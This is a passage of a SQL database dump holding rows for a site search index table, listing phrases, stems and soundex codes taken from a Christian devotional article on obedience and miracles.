(256172, 'cut off', 'cut off', 0, 1, 1.2333, 'C310', 2, '*'),
(256173, 'cut off from', 'cut off from', 0, 1, 1.4, 'C3165', 2, '*'),
(256174, 'date', 'date', 0, 0, 0.2667, 'D000', 3, '*'),
(256175, 'date that\'s', 'date that', 0, 1, 1.3667, 'D200', 2, '*'),
(256176, 'date that\'s why', 'date that why', 0, 1, 1.5, 'D200', 2, '*'),
(256177, 'dearly beloved your', 'dearli beloved your', 0, 1, 1.6333, 'D6414136', 2, '*'),
(256178, 'dimension of', 'dimens of', 0, 1, 1.4, 'D5251', 2, '*'),
(256179, 'dimension of the', 'dimens of the', 0, 1, 1.5333, 'D52513', 2, '*'),
(256180, 'dimension until', 'dimens until', 0, 1, 1.5, 'D52534', 2, '*'),
(256181, 'dimension until you', 'dimens until you', 0, 1, 1.6333, 'D52534', 2, '*'),
(256182, 'dip', 'dip', 0, 0, 0.2, 'D100', 2, '*'),
(256183, 'dip seven', 'dip seven', 0, 1, 1.3, 'D1215', 2, '*'),
(256184, 'dip seven times', 'dip seven times', 0, 1, 1.5, 'D1215352', 2, '*'),
(256185, 'disobedience repent', 'disobedi repent', 0, 1, 1.6333, 'D213526153', 2, '*'),
(256186, 'disobedience repent and', 'disobedi repent and', 0, 1, 1.7667, 'D21352615353', 2, '*'),
(256187, 'do and she', 'do and she', 0, 1, 1.3333, 'D532', 2, '*'),
(256188, 'do at the', 'do at the', 0, 1, 1.3, 'D000', 2, '*'),
(256189, 'do till', 'do till', 0, 1, 1.2333, 'D400', 2, '*'),
(256190, 'do till date', 'do till date', 0, 1, 1.4, 'D430', 2, '*'),
(256191, 'don\'t experience', 'don experience', 0, 1, 1.5333, 'D5321652', 2, '*'),
(256192, 'don\'t experience it', 'don experience it', 0, 1, 1.6333, 'D53216523', 2, '*'),
(256193, 'double', 'doubl', 0, 0, 0.4, 'D140', 2, '*'),
(256194, 'double boat', 'doubl boat', 0, 1, 1.3667, 'D1413', 2, '*'),
(256195, 'double boat luk', 'doubl boat luk', 0, 1, 1.5, 'D141342', 2, '*'),
(256196, 'down his', 'down his', 0, 1, 1.2667, 'D520', 2, '*'),
(256197, 'down his net', 'down his net', 0, 1, 1.4, 'D5253', 2, '*'),
(256198, 'dream centre i', 'dream centre i', 0, 1, 1.4667, 'D652536', 2, '*'),
(256199, 'elisha to', 'elisha to', 0, 1, 1.3, 'E423', 2, '*'),
(256200, 'elisha to dip', 'elisha to dip', 0, 1, 1.4333, 'E4231', 2, '*'),
(256201, 'encourage you to', 'encourag you to', 0, 1, 1.5333, 'E52623', 2, '*'),
(256202, 'enslaved', 'enslav', 0, 0, 0.5333, 'E52413', 2, '*'),
(256203, 'enslaved but', 'enslav but', 0, 1, 1.4, 'E5241313', 2, '*'),
(256204, 'enslaved but came', 'enslav but came', 0, 1, 1.5667, 'E524131325', 2, '*'),
(256205, 'even peter', 'even peter', 0, 1, 1.3333, 'E15136', 2, '*'),
(256206, 'even peter who', 'even peter who', 0, 1, 1.4667, 'E15136', 2, '*'),
(256207, 'everything i', 'everyth i', 0, 1, 1.4, 'E16352', 2, '*'),
(256208, 'everything i am', 'everyth i am', 0, 1, 1.5, 'E163525', 2, '*'),
(256209, 'experience is', 'experi is', 0, 1, 1.4333, 'E21652', 2, '*'),
(256210, 'experience is in', 'experi is in', 0, 1, 1.5333, 'E216525', 2, '*'),
(256211, 'experience it', 'experi it', 0, 1, 1.4333, 'E216523', 2, '*'),
(256212, 'experience it so', 'experi it so', 0, 1, 1.5333, 'E2165232', 2, '*'),
(256213, 'experience miracles', 'experi miracles', 0, 1, 1.6333, 'E2165256242', 2, '*'),
(256214, 'experience miracles or', 'experi miracles or', 0, 1, 1.7333, 'E21652562426', 2, '*'),
(256215, 'experience the', 'experi the', 0, 1, 1.4667, 'E216523', 2, '*'),
(256216, 'experience the supernatural', 'experi the supernatural', 0, 1, 1.9, 'E2165232165364', 2, '*'),
(256217, 'far-fetched', 'far-fetch', 0, 0, 0.7333, 'F61323', 2, '*'),
(256218, 'far-fetched ask', 'far-fetch ask', 0, 1, 1.5, 'F613232', 2, '*'),
(256219, 'far-fetched ask yourself', 'far-fetch ask yourself', 0, 1, 1.8, 'F6132326241', 2, '*'),
(256220, 'father\'s heart 04', 'father heart 04', 0, 1, 1.5667, 'F36263', 2, '*'),
(256221, 'feast', 'feast', 0, 0, 0.3333, 'F230', 2, '*'),
(256222, 'feast at', 'feast at', 0, 1, 1.2667, 'F230', 2, '*'),
(256223, 'feast at cana', 'feast at cana', 0, 1, 1.4333, 'F2325', 2, '*'),
(256224, 'from miracles', 'from miracles', 0, 1, 1.4333, 'F656242', 2, '*'),
(256225, 'from miracles and', 'from miracles and', 0, 1, 1.5667, 'F65624253', 2, '*'),
(256226, 'from naaman', 'from naaman', 0, 1, 1.3667, 'F650', 2, '*'),
(256227, 'from naaman the', 'from naaman the', 0, 1, 1.5, 'F653', 2, '*'),
(256228, 'god since', 'god since', 0, 1, 1.3, 'G3252', 2, '*'),
(256229, 'god since i', 'god since i', 0, 1, 1.3667, 'G3252', 2, '*'),
(256230, 'god very', 'god very', 0, 1, 1.2667, 'G316', 2, '*'),
(256231, 'god very serious', 'god very serious', 0, 1, 1.5333, 'G316262', 2, '*'),
(256232, 'god who told', 'god who told', 0, 1, 1.4, 'G343', 2, '*'),
(256233, 'had a return', 'had a return', 0, 1, 1.4, 'H36365', 2, '*'),
(256234, 'had miracles', 'had miracles', 0, 1, 1.4, 'H356242', 2, '*'),
(256235, 'had miracles in', 'had miracles in', 0, 1, 1.5, 'H3562425', 2, '*'),
(256236, 'hardly', 'hardli', 0, 0, 0.4, 'H634', 2, '*'),
(256237, 'hardly experience', 'hardli experience', 0, 1, 1.5667, 'H63421652', 2, '*'),
(256238, 'hardly experience miracles', 'hardli experience miracles', 0, 1, 1.8667, 'H6342165256242', 2, '*'),
(256239, 'have kept', 'have kept', 0, 1, 1.3, 'H1213', 3, '*'),
(256240, 'have kept wondering', 'have kept wondering', 0, 1, 1.6333, 'H121353652', 2, '*'),
(256241, 'have obeyed', 'have obeyed', 0, 1, 1.3667, 'H130', 4, '*'),
(256242, 'have obeyed everything', 'have obeyed everything', 0, 1, 1.7333, 'H1316352', 2, '*'),
(256243, 'he placed', 'he placed', 0, 1, 1.3, 'H1423', 2, '*'),
(256244, 'he placed over', 'he placed over', 0, 1, 1.4667, 'H142316', 2, '*'),
(256245, 'he told', 'he told', 0, 1, 1.2333, 'H343', 3, '*'),
(256246, 'he told me', 'he told me', 0, 1, 1.3333, 'H3435', 2, '*'),
(256247, 'hear of', 'hear of', 0, 1, 1.2333, 'H610', 2, '*'),
(256248, 'hear of the', 'hear of the', 0, 1, 1.3667, 'H613', 2, '*'),
(256249, 'heart 04', 'heart 04', 0, 1, 1.2667, 'H630', 2, '*'),
(256250, 'heart 04 06', 'heart 04 06', 0, 1, 1.3667, 'H630', 2, '*'),
(256251, 'help you in', 'help you in', 0, 1, 1.3667, 'H415', 2, '*'),
(256252, 'her what', 'her what', 0, 1, 1.2667, 'H630', 2, '*'),
(256253, 'her what to', 'her what to', 0, 1, 1.3667, 'H630', 2, '*'),
(256254, 'him i', 'him i', 0, 1, 1.1667, 'H500', 3, '*'),
(256255, 'him i have', 'him i have', 0, 1, 1.3333, 'H510', 2, '*'),
(256256, 'his net', 'hi net', 0, 1, 1.2333, 'H253', 2, '*'),
(256257, 'his net and', 'hi net and', 0, 1, 1.3667, 'H25353', 2, '*'),
(256258, 'i am sure', 'i am sure', 0, 1, 1.3, 'I526', 2, '*'),
(256259, 'i came', 'i came', 0, 1, 1.2, 'I250', 2, '*'),
(256260, 'i came on', 'i came on', 0, 1, 1.3, 'I250', 2, '*'),
(256261, 'i can stand', 'i can stand', 0, 1, 1.3667, 'I252353', 2, '*'),
(256262, 'i encourage', 'i encourage', 0, 1, 1.3667, 'I5262', 2, '*'),
(256263, 'i encourage you', 'i encourage you', 0, 1, 1.5, 'I5262', 2, '*'),
(256264, 'i have obeyed', 'i have obeyed', 0, 1, 1.4333, 'I130', 3, '*'),
(256265, 'i obeying', 'i obeying', 0, 1, 1.3, 'I152', 2, '*'),
(256266, 'i obeying god', 'i obeying god', 0, 1, 1.4333, 'I1523', 2, '*'),
(256267, 'in jordan', 'in jordan', 0, 1, 1.3, 'I52635', 2, '*'),
(256268, 'in jordan 2', 'in jordan 2', 0, 1, 1.3667, 'I52635', 2, '*'),
(256269, 'in the dimension', 'in the dimension', 0, 1, 1.5333, 'I53525', 2, '*'),
(256270, 'in the road', 'in the road', 0, 1, 1.3667, 'I5363', 2, '*'),
(256271, 'in their lives', 'in their lives', 0, 1, 1.4667, 'I536412', 2, '*'),
(256272, 'instructed to', 'instruct to', 0, 1, 1.4333, 'I523623', 2, '*'),
(256273, 'instructed to obey', 'instruct to obey', 0, 1, 1.6, 'I5236231', 2, '*'),
(256274, 'is any', 'is any', 0, 1, 1.2, 'I250', 2, '*'),
(256275, 'is any area', 'is any area', 0, 1, 1.3667, 'I256', 2, '*'),
(256276, 'is critical', 'is critical', 0, 1, 1.3667, 'I26324', 2, '*'),
(256277, 'is critical may', 'is critical may', 0, 1, 1.5, 'I263245', 2, '*'),
(256278, 'is not real', 'is not real', 0, 1, 1.3667, 'I25364', 2, '*'),
(256279, 'is what connects', 'is what connects', 0, 1, 1.5333, 'I2325232', 2, '*'),
(256280, 'is your season', 'is your season', 0, 1, 1.4667, 'I2625', 2, '*'),
(256281, 'issue of', 'issu of', 0, 1, 1.2667, 'I210', 2, '*'),
(256282, 'issue of obeying', 'issu of obeying', 0, 1, 1.5333, 'I2152', 2, '*'),
(256283, 'it seems that', 'it seems that', 0, 1, 1.4333, 'I32523', 2, '*'),
(256284, 'it so', 'it so', 0, 1, 1.1667, 'I320', 2, '*'),
(256285, 'it so check', 'it so check', 0, 1, 1.3667, 'I320', 2, '*'),
(256286, 'item 50', 'item 50', 0, 1, 1.2333, 'I350', 2, '*'),
(256287, 'item 50 from', 'item 50 from', 0, 1, 1.4, 'I35165', 2, '*'),
(256288, 'jesus instructed', 'jesu instructed', 0, 1, 1.5333, 'J523623', 2, '*'),
(256289, 'jesus instructed to', 'jesu instructed to', 0, 1, 1.6333, 'J523623', 2, '*'),
(256290, 'jesus let', 'jesu let', 0, 1, 1.3, 'J430', 2, '*'),
(256291, 'jesus let down', 'jesu let down', 0, 1, 1.4667, 'J435', 2, '*'),
(256292, 'jesus to the', 'jesu to the', 0, 1, 1.4, 'J300', 2, '*'),
(256293, 'jesus told', 'jesu told', 0, 1, 1.3333, 'J343', 2, '*'),
(256294, 'jesus told them', 'jesu told them', 0, 1, 1.5, 'J3435', 2, '*'),
(256295, 'joh', 'joh', 0, 0, 0.2, 'J000', 2, '*'),
(256296, 'joh 2', 'joh 2', 0, 1, 1.1667, 'J000', 2, '*'),
(256297, 'joh 2 5', 'joh 2 5', 0, 1, 1.2333, 'J000', 2, '*'),
(256298, 'jordan 2', 'jordan 2', 0, 1, 1.2667, 'J635', 2, '*'),
(256299, 'jordan 2 kin', 'jordan 2 kin', 0, 1, 1.4, 'J63525', 2, '*'),
(256300, 'k2 item 50', 'k2 item 50', 0, 1, 1.3333, 'K350', 2, '*'),
(256301, 'keep being cut', 'keep being cut', 0, 1, 1.4667, 'K1523', 2, '*'),
(256302, 'kept wondering', 'kept wondering', 0, 1, 1.4667, 'K1353652', 2, '*'),
(256303, 'kept wondering why', 'kept wondering why', 0, 1, 1.6, 'K1353652', 2, '*'),
(256304, 'kin', 'kin', 0, 0, 0.2, 'K500', 2, '*'),
(256305, 'kin 4', 'kin 4', 0, 1, 1.1667, 'K500', 2, '*'),
(256306, 'kin 4 1', 'kin 4 1', 0, 1, 1.2333, 'K500', 2, '*'),
(256307, 'kin 5', 'kin 5', 0, 1, 1.1667, 'K500', 2, '*'),
(256308, 'kin 5 1', 'kin 5 1', 0, 1, 1.2333, 'K500', 2, '*'),
(256309, 'leper', 'leper', 0, 0, 0.3333, 'L160', 2, '*'),
(256310, 'leper who', 'leper who', 0, 1, 1.3, 'L160', 2, '*'),
(256311, 'leper who obeyed', 'leper who obeyed', 0, 1, 1.5333, 'L1613', 2, '*'),
(256312, 'let down', 'let down', 0, 1, 1.2667, 'L350', 2, '*'),
(256313, 'let down his', 'let down his', 0, 1, 1.4, 'L352', 2, '*'),
(256314, 'life to jesus', 'life to jesus', 0, 1, 1.4333, 'L132', 2, '*'),
(256315, 'life today and', 'life today and', 0, 1, 1.4667, 'L1353', 2, '*'),
(256316, 'lives from', 'live from', 0, 1, 1.3333, 'L12165', 2, '*'),
(256317, 'lives from naaman', 'live from naaman', 0, 1, 1.5667, 'L12165', 2, '*'),
(256318, 'living an', 'live an', 0, 1, 1.3, 'L1525', 2, '*'),
(256319, 'living an obedient', 'live an obedient', 0, 1, 1.6, 'L15251353', 2, '*'),
(256320, 'luk', 'luk', 0, 0, 0.2, 'L200', 2, '*'),
(256321, 'luk 5', 'luk 5', 0, 1, 1.1667, 'L200', 2, '*'),
(256322, 'luk 5 4', 'luk 5 4', 0, 1, 1.2333, 'L200', 2, '*'),
(256323, 'marriage feast', 'marriag feast', 0, 1, 1.4667, 'M62123', 2, '*'),
(256324, 'marriage feast at', 'marriag feast at', 0, 1, 1.5667, 'M62123', 2, '*'),
(256325, 'mary the', 'mari the', 0, 1, 1.2667, 'M630', 2, '*'),
(256326, 'mary the mother', 'mari the mother', 0, 1, 1.5, 'M63536', 2, '*'),
(256327, 'master and tell', 'master and tell', 0, 1, 1.5, 'M236534', 2, '*'),
(256328, 'master jesus', 'master jesus', 0, 1, 1.4, 'M2362', 2, '*'),
(256329, 'master jesus let', 'master jesus let', 0, 1, 1.5333, 'M236243', 2, '*'),
(256330, 'master\'s word', 'master word', 0, 1, 1.4333, 'M236263', 2, '*'),
(256331, 'master\'s word mat', 'master word mat', 0, 1, 1.5667, 'M23626353', 2, '*'),
(256332, 'mat 14', 'mat 14', 0, 1, 1.2, 'M300', 2, '*'),
(256333, 'mat 14 28', 'mat 14 28', 0, 1, 1.3, 'M300', 2, '*'),
(256334, 'may only', 'mai only', 0, 1, 1.2667, 'M400', 2, '*'),
(256335, 'may only hear', 'mai only hear', 0, 1, 1.4333, 'M460', 2, '*'),
(256336, 'men he', 'men he', 0, 1, 1.2, 'M000', 2, '*'),
(256337, 'men he placed', 'men he placed', 0, 1, 1.4333, 'M1423', 2, '*'),
(256338, 'men who', 'men who', 0, 1, 1.2333, 'M000', 2, '*'),
(256339, 'men who obeyed', 'men who obeyed', 0, 1, 1.4667, 'M130', 2, '*'),
(256340, 'miracles and', 'miracl and', 0, 1, 1.4, 'M624253', 2, '*'),
(256341, 'miracles and the', 'miracl and the', 0, 1, 1.5333, 'M624253', 2, '*'),
(256342, 'miracles in', 'miracl in', 0, 1, 1.3667, 'M62425', 2, '*'),
(256343, 'miracles in their', 'miracl in their', 0, 1, 1.5667, 'M6242536', 2, '*'),
(256344, 'miracles or', 'miracl or', 0, 1, 1.3667, 'M62426', 2, '*'),
(256345, 'miracles or it', 'miracl or it', 0, 1, 1.4667, 'M624263', 2, '*'),
(256346, 'mother of jesus', 'mother of jesus', 0, 1, 1.5, 'M3612', 2, '*'),
(256347, 'naaman', 'naaman', 0, 0, 0.4, 'N000', 2, '*'),
(256348, 'naaman the', 'naaman the', 0, 1, 1.3333, 'N300', 2, '*'),
(256349, 'naaman the leper', 'naaman the leper', 0, 1, 1.5333, 'N3416', 2, '*'),
(256350, 'net', 'net', 0, 0, 0.2, 'N300', 2, '*'),
(256351, 'net and', 'net and', 0, 1, 1.2333, 'N353', 2, '*'),
(256352, 'net and had', 'net and had', 0, 1, 1.3667, 'N353', 2, '*'),
(256353, 'night and', 'night and', 0, 1, 1.3, 'N2353', 2, '*'),
(256354, 'night and caught', 'night and caught', 0, 1, 1.5333, 'N235323', 2, '*'),
(256355, 'not be far-fetched', 'not be far-fetched', 0, 1, 1.6, 'N3161323', 2, '*'),
(256356, 'not experience', 'not experience', 0, 1, 1.4667, 'N321652', 2, '*'),
(256357, 'not experience it', 'not experience it', 0, 1, 1.5667, 'N3216523', 2, '*'),
(256358, 'not real', 'not real', 0, 1, 1.2667, 'N364', 2, '*'),
(256359, 'not real because', 'not real because', 0, 1, 1.5333, 'N36412', 2, '*'),
(256360, 'nothing but', 'noth but', 0, 1, 1.3667, 'N35213', 2, '*'),
(256361, 'nothing but at', 'noth but at', 0, 1, 1.4667, 'N35213', 2, '*'),
(256362, 'obedience is', 'obedi is', 0, 1, 1.4, 'O1352', 2, '*'),
(256363, 'obedience is critical', 'obedi is critical', 0, 1, 1.7, 'O13526324', 2, '*'),
(256364, 'obedience is what', 'obedi is what', 0, 1, 1.5667, 'O13523', 2, '*'),
(256365, 'obedience too', 'obedi too', 0, 1, 1.4333, 'O13523', 2, '*'),
(256366, 'obedience too and', 'obedi too and', 0, 1, 1.5667, 'O1352353', 2, '*'),
(256367, 'obedient life', 'obedi life', 0, 1, 1.4333, 'O135341', 2, '*'),
(256368, 'obedient life to', 'obedi life to', 0, 1, 1.5333, 'O1353413', 2, '*'),
(256369, 'obey whatever', 'obei whatever', 0, 1, 1.4333, 'O1316', 2, '*'),
(256370, 'obey whatever jesus', 'obei whatever jesus', 0, 1, 1.6333, 'O13162', 2, '*'),
(256371, 'obeyed', 'obei', 0, 0, 0.4, 'O130', 5, '*'),
(256372, 'obeyed 2', 'obei 2', 0, 1, 1.2667, 'O130', 2, '*'),
(256373, 'obeyed 2 kin', 'obei 2 kin', 0, 1, 1.4, 'O1325', 2, '*'),
(256374, 'obeyed and', 'obei and', 0, 1, 1.3333, 'O1353', 3, '*'),
(256375, 'obeyed and had', 'obei and had', 0, 1, 1.4667, 'O1353', 2, '*'),
(256376, 'obeyed elisha', 'obei elisha', 0, 1, 1.4333, 'O1342', 2, '*'),
(256377, 'obeyed elisha to', 'obei elisha to', 0, 1, 1.5333, 'O13423', 2, '*'),
(256378, 'obeyed everything', 'obei everything', 0, 1, 1.5667, 'O1316352', 2, '*'),
(256379, 'obeyed everything i', 'obei everything i', 0, 1, 1.6333, 'O1316352', 2, '*'),
(256380, 'obeying god', 'obei god', 0, 1, 1.3667, 'O1523', 2, '*'),
(256381, 'obeying god since', 'obei god since', 0, 1, 1.5667, 'O1523252', 2, '*'),
(256382, 'obeying god very', 'obei god very', 0, 1, 1.5333, 'O152316', 2, '*'),
(256383, 'obeying this', 'obei this', 0, 1, 1.4, 'O15232', 2, '*'),
(256384, 'obeying this is', 'obei this is', 0, 1, 1.5, 'O15232', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(256385, 'of disobedience', 'of disobedience', 0, 1, 1.5, 'O1321352', 2, '*'),
(256386, 'of disobedience repent', 'of disobedience repent', 0, 1, 1.7333, 'O13213526153', 2, '*'),
(256387, 'of god who', 'of god who', 0, 1, 1.3333, 'O123', 2, '*'),
(256388, 'of jesus instructed', 'of jesus instructed', 0, 1, 1.6333, 'O12523623', 2, '*'),
(256389, 'of obedience', 'of obedience', 0, 1, 1.4, 'O1352', 3, '*'),
(256390, 'of obedience too', 'of obedience too', 0, 1, 1.5333, 'O13523', 2, '*'),
(256391, 'of obeying god', 'of obeying god', 0, 1, 1.4667, 'O1523', 2, '*'),
(256392, 'of the boat', 'of the boat', 0, 1, 1.3667, 'O1313', 2, '*'),
(256393, 'of the double', 'of the double', 0, 1, 1.4333, 'O1314', 2, '*'),
(256394, 'of the master', 'of the master', 0, 1, 1.4333, 'O135236', 2, '*'),
(256395, 'off from', 'off from', 0, 1, 1.2667, 'O165', 2, '*'),
(256396, 'off from miracles', 'off from miracles', 0, 1, 1.5667, 'O1656242', 2, '*'),
(256397, 'on board', 'on board', 0, 1, 1.2667, 'O5163', 2, '*'),
(256398, 'on board in', 'on board in', 0, 1, 1.3667, 'O51635', 2, '*'),
(256399, 'on the road', 'on the road', 0, 1, 1.3667, 'O5363', 3, '*'),
(256400, 'on water', 'on water', 0, 1, 1.2667, 'O536', 2, '*'),
(256401, 'on water but', 'on water but', 0, 1, 1.4, 'O53613', 2, '*'),
(256402, 'only hear', 'onli hear', 0, 1, 1.3, 'O546', 2, '*'),
(256403, 'only hear of', 'onli hear of', 0, 1, 1.4, 'O5461', 2, '*'),
(256404, 'or it', 'or it', 0, 1, 1.1667, 'O630', 2, '*'),
(256405, 'or it seems', 'or it seems', 0, 1, 1.3667, 'O63252', 2, '*'),
(256406, 'our experience', 'our experience', 0, 1, 1.4667, 'O621652', 2, '*'),
(256407, 'our experience is', 'our experience is', 0, 1, 1.5667, 'O621652', 2, '*'),
(256408, 'over you', 'over you', 0, 1, 1.2667, 'O160', 2, '*'),
(256409, 'over you and', 'over you and', 0, 1, 1.4, 'O1653', 2, '*'),
(256410, 'over you you', 'over you you', 0, 1, 1.4, 'O160', 2, '*'),
(256411, 'perhaps you', 'perhap you', 0, 1, 1.3667, 'P612', 2, '*'),
(256412, 'perhaps you have', 'perhap you have', 0, 1, 1.5333, 'P6121', 2, '*'),
(256413, 'peter', 'peter', 0, 0, 0.3333, 'P360', 2, '*'),
(256414, 'peter also', 'peter also', 0, 1, 1.3333, 'P3642', 2, '*'),
(256415, 'peter also who', 'peter also who', 0, 1, 1.4667, 'P3642', 2, '*'),
(256416, 'peter who', 'peter who', 0, 1, 1.3, 'P360', 2, '*'),
(256417, 'peter who stepped', 'peter who stepped', 0, 1, 1.5667, 'P362313', 2, '*'),
(256418, 'placed over', 'place over', 0, 1, 1.3667, 'P42316', 2, '*'),
(256419, 'placed over you', 'place over you', 0, 1, 1.5, 'P42316', 2, '*'),
(256420, 'real because', 'real because', 0, 1, 1.4, 'R412', 2, '*'),
(256421, 'real because you', 'real because you', 0, 1, 1.5333, 'R412', 2, '*'),
(256422, 'reason may', 'reason may', 0, 1, 1.3333, 'R250', 2, '*'),
(256423, 'reason may not', 'reason may not', 0, 1, 1.4667, 'R253', 2, '*'),
(256424, 'remember the woman', 'rememb the woman', 0, 1, 1.6, 'R51635', 2, '*'),
(256425, 'repent and', 'repent and', 0, 1, 1.3333, 'R15353', 2, '*'),
(256426, 'repent and start', 'repent and start', 0, 1, 1.5333, 'R153532363', 2, '*'),
(256427, 'return of', 'return of', 0, 1, 1.3, 'R3651', 2, '*'),
(256428, 'return of the', 'return of the', 0, 1, 1.4333, 'R36513', 2, '*'),
(256429, 'road of', 'road of', 0, 1, 1.2333, 'R310', 3, '*'),
(256430, 'road of obedience', 'road of obedience', 0, 1, 1.5667, 'R31352', 3, '*'),
(256431, 'road of the', 'road of the', 0, 1, 1.3667, 'R313', 2, '*'),
(256432, 's heart 04', 's heart 04', 0, 1, 1.3333, 'S630', 2, '*'),
(256433, 'scriptures we', 'scriptur we', 0, 1, 1.4333, 'S61362', 2, '*'),
(256434, 'scriptures we see', 'scriptur we see', 0, 1, 1.5667, 'S61362', 2, '*'),
(256435, 'season to', 'season to', 0, 1, 1.3, 'S530', 2, '*'),
(256436, 'season to walk', 'season to walk', 0, 1, 1.4667, 'S5342', 2, '*'),
(256437, 'see if', 'see if', 0, 1, 1.2, 'S100', 2, '*'),
(256438, 'see if there', 'see if there', 0, 1, 1.4, 'S136', 2, '*'),
(256439, 'see men who', 'see men who', 0, 1, 1.3667, 'S500', 2, '*'),
(256440, 'seems that', 'seem that', 0, 1, 1.3333, 'S523', 2, '*'),
(256441, 'seems that the', 'seem that the', 0, 1, 1.4667, 'S523', 2, '*'),
(256442, 'serious you', 'seriou you', 0, 1, 1.3667, 'S620', 2, '*'),
(256443, 'serious you will', 'seriou you will', 0, 1, 1.5333, 'S624', 2, '*'),
(256444, 'servants that', 'servant that', 0, 1, 1.4333, 'S615323', 2, '*'),
(256445, 'servants that mary', 'servant that mary', 0, 1, 1.6, 'S61532356', 2, '*'),
(256446, 'seven times', 'seven times', 0, 1, 1.3667, 'S15352', 2, '*'),
(256447, 'seven times in', 'seven times in', 0, 1, 1.4667, 'S153525', 2, '*'),
(256448, 'she obeyed', 'she obeyed', 0, 1, 1.3333, 'S130', 2, '*'),
(256449, 'she obeyed 2', 'she obeyed 2', 0, 1, 1.4, 'S130', 2, '*'),
(256450, 'since i', 'sinc i', 0, 1, 1.2333, 'S520', 2, '*'),
(256451, 'since i came', 'sinc i came', 0, 1, 1.4, 'S525', 2, '*'),
(256452, 'so check', 'so check', 0, 1, 1.2667, 'S000', 2, '*'),
(256453, 'so check your', 'so check your', 0, 1, 1.4333, 'S600', 2, '*'),
(256454, 'sons were', 'son were', 0, 1, 1.3, 'S526', 2, '*'),
(256455, 'sons were to', 'son were to', 0, 1, 1.4, 'S5263', 2, '*'),
(256456, 'stand before the', 'stand before the', 0, 1, 1.5333, 'S353163', 2, '*'),
(256457, 'start living', 'start living', 0, 1, 1.4, 'S3634152', 2, '*'),
(256458, 'start living an', 'start living an', 0, 1, 1.5, 'S36341525', 2, '*'),
(256459, 'start obeying', 'start obeying', 0, 1, 1.4333, 'S363152', 2, '*'),
(256460, 'start obeying this', 'start obeying this', 0, 1, 1.6, 'S36315232', 2, '*'),
(256461, 'stepped', 'step', 0, 0, 0.4667, 'S313', 2, '*'),
(256462, 'stepped out', 'step out', 0, 1, 1.3667, 'S313', 2, '*'),
(256463, 'stepped out of', 'step out of', 0, 1, 1.4667, 'S3131', 2, '*'),
(256464, 'supernatural all', 'supernatur all', 0, 1, 1.5333, 'S165364', 2, '*'),
(256465, 'supernatural all through', 'supernatur all through', 0, 1, 1.8, 'S165364362', 2, '*'),
(256466, 'supernatural and', 'supernatur and', 0, 1, 1.5333, 'S16536453', 2, '*'),
(256467, 'supernatural and not', 'supernatur and not', 0, 1, 1.6667, 'S1653645353', 2, '*'),
(256468, 'supernatural dimension', 'supernatur dimension', 0, 1, 1.7333, 'S1653643525', 2, '*'),
(256469, 'supernatural dimension until', 'supernatur dimension until', 0, 1, 1.9333, 'S165364352534', 2, '*'),
(256470, 'supernatural in', 'supernatur in', 0, 1, 1.5, 'S1653645', 2, '*'),
(256471, 'supernatural in the', 'supernatur in the', 0, 1, 1.6333, 'S16536453', 2, '*'),
(256472, 'supernatural is', 'supernatur is', 0, 1, 1.5, 'S1653642', 2, '*'),
(256473, 'supernatural is not', 'supernatur is not', 0, 1, 1.6333, 'S165364253', 2, '*'),
(256474, 'supernatural perhaps', 'supernatur perhaps', 0, 1, 1.6667, 'S1653641612', 2, '*'),
(256475, 'supernatural perhaps you', 'supernatur perhaps you', 0, 1, 1.8, 'S1653641612', 2, '*'),
(256476, 'supernatural until', 'supernatur until', 0, 1, 1.6, 'S165364534', 2, '*'),
(256477, 'supernatural until you', 'supernatur until you', 0, 1, 1.7333, 'S165364534', 2, '*'),
(256478, 'sure he', 'sure he', 0, 1, 1.2333, 'S600', 2, '*'),
(256479, 'sure he told', 'sure he told', 0, 1, 1.4, 'S6343', 2, '*'),
(256480, 'take the issue', 'take the issue', 0, 1, 1.4667, 'T232', 2, '*'),
(256481, 'tell him i', 'tell him i', 0, 1, 1.3333, 'T450', 2, '*'),
(256482, 'that mary the', 'that mary the', 0, 1, 1.4333, 'T563', 2, '*'),
(256483, 'that the supernatural', 'that the supernatural', 0, 1, 1.7, 'T2165364', 2, '*'),
(256484, 'that\'s why our', 'that why our', 0, 1, 1.4667, 'T260', 2, '*'),
(256485, 'the authorities', 'the authorities', 0, 1, 1.5, 'T632', 2, '*'),
(256486, 'the authorities over', 'the authorities over', 0, 1, 1.6667, 'T63216', 2, '*'),
(256487, 'the boat', 'the boat', 0, 1, 1.2667, 'T130', 2, '*'),
(256488, 'the boat at', 'the boat at', 0, 1, 1.3667, 'T130', 2, '*'),
(256489, 'the calling i', 'the calling i', 0, 1, 1.4333, 'T2452', 2, '*'),
(256490, 'the dimension', 'the dimension', 0, 1, 1.4333, 'T525', 2, '*'),
(256491, 'the dimension of', 'the dimension of', 0, 1, 1.5333, 'T5251', 2, '*'),
(256492, 'the double', 'the double', 0, 1, 1.3333, 'T140', 2, '*'),
(256493, 'the double boat', 'the double boat', 0, 1, 1.5, 'T1413', 2, '*'),
(256494, 'the issue', 'the issue', 0, 1, 1.3, 'T200', 2, '*'),
(256495, 'the issue of', 'the issue of', 0, 1, 1.4, 'T210', 2, '*'),
(256496, 'the leper', 'the leper', 0, 1, 1.3, 'T416', 2, '*'),
(256497, 'the leper who', 'the leper who', 0, 1, 1.4333, 'T416', 2, '*'),
(256498, 'the marriage', 'the marriage', 0, 1, 1.4, 'T562', 2, '*'),
(256499, 'the marriage feast', 'the marriage feast', 0, 1, 1.6, 'T562123', 2, '*'),
(256500, 'the master and', 'the master and', 0, 1, 1.4667, 'T523653', 2, '*'),
(256501, 'the master jesus', 'the master jesus', 0, 1, 1.5333, 'T52362', 2, '*'),
(256502, 'the master\'s word', 'the master word', 0, 1, 1.5667, 'T5236263', 2, '*'),
(256503, 'the men', 'the men', 0, 1, 1.2333, 'T500', 2, '*'),
(256504, 'the men he', 'the men he', 0, 1, 1.3333, 'T500', 2, '*'),
(256505, 'the mother', 'the mother', 0, 1, 1.3333, 'T536', 2, '*'),
(256506, 'the mother of', 'the mother of', 0, 1, 1.4333, 'T5361', 2, '*'),
(256507, 'the reason may', 'the reason may', 0, 1, 1.4667, 'T625', 2, '*'),
(256508, 'the road of', 'the road of', 0, 1, 1.3667, 'T631', 3, '*'),
(256509, 'the servants', 'the servants', 0, 1, 1.4, 'T261532', 2, '*'),
(256510, 'the servants that', 'the servants that', 0, 1, 1.5667, 'T2615323', 2, '*'),
(256511, 'the supernatural all', 'the supernatural all', 0, 1, 1.6667, 'T2165364', 2, '*'),
